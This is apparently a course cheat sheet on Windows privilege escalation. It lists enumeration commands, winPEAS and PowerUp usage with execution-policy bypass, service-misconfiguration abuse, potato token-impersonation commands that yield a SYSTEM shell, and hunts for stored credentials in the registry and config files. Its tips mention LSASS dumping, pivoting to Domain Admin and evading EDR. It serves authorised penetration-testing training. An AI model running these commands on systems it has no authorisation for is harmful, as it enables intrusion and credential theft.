Cheat sheet — Windows Privilege Escalation¶
Companion to Module 11 — Privilege Escalation: Windows · CC BY 4.0 — print it, pin it, share it.
Last reviewed: 2026-07
Only enumerate and escalate on systems you own or have explicit written permission to test.
Orient — who am I, what privileges¶
whoami /all :: user, groups, and PRIVILEGES (the important part)
whoami /priv :: SeImpersonate / SeAssignPrimaryToken = potato territory
systeminfo :: OS build + hotfixes (for missing-patch checks)
net user %username% :: group membership
Automated enumeration — winPEAS / PrivescCheck / PowerUp¶
# winPEAS — broad, colour-coded (red = likely win). Prefer the in-memory route on monitored hosts.
.\winPEASx64.exe
# PrivescCheck — focused, low-noise, great for reports
powershell -ep bypass -c "Import-Module .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
# PowerUp — the classic; runs all checks and can auto-abuse some
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks # enumerate every vector
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
Service misconfigurations (the bread and butter)¶
# Unquoted service paths — Windows walks the path; a writable dir before a space = code exec as SYSTEM
Get-CimInstance Win32_Service | ? { $_.PathName -notmatch '"' -and $_.PathName -match ' ' } |
select Name, PathName, StartMode
# Weak service binary/permissions (PowerUp names the abuse for you)
Get-ModifiableServiceFile # PowerUp: services whose EXE you can overwrite
Get-ModifiableService # services you can reconfigure (change binPath)
Restart-Service <name> # (or reboot) to trigger your replaced binary
sc qc <service> :: query config (binpath, start type, account)
accesschk.exe -uwcqv "Users" * :: (Sysinternals) services writable by low-priv users
Token impersonation — the "potato" family¶
# Precondition: SeImpersonatePrivilege (common on IIS/MSSQL service accounts).
# The potato exploits (PrintSpoofer, RoguePotato, GodPotato, etc.) abuse it to run as SYSTEM.
PrintSpoofer64.exe -i -c cmd # interactive SYSTEM shell (needs SeImpersonate)
GodPotato -cmd "cmd /c whoami" # SYSTEM command exec
Other common vectors¶
# AlwaysInstallElevated — MSIs install as SYSTEM if BOTH keys are 1
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Stored credentials / autologon
cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
Get-ChildItem -Recurse C:\ -Include *.config,unattend.xml,*.xml 2>$null | Select-String password
Gotchas worth remembering¶
- The precondition minefield is the hard part, not an exploit. GodPotato needs
SeImpersonate; an unquoted-path abuse needs a writable directory in that path. Confirm every precondition before you fire — a failed potato can crash the service or alert the SOC. - Read
whoami /privfirst.SeImpersonatePrivilegeorSeAssignPrimaryTokenPrivilegepresent = potato path is likely the fastest route to SYSTEM, before you scan for anything else. - SYSTEM is a springboard, not the finish. Local SYSTEM lets you dump LSASS, grab machine/cached creds, and pivot toward Domain Admin — local root is the start of the domain story.
- winPEAS flags candidates; you confirm exploitability. A "weak service permission" in red still needs you to verify you can overwrite the binary and restart the service. Don't report a finding you haven't proven.
- Watch the execution-policy and AMSI noise.
-ep bypassand loading PowerUp/winPEAS are exactly what EDR watches for. Use the in-memory load and expect 4104 script-block logging to catch it on a monitored host.
Comments
Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).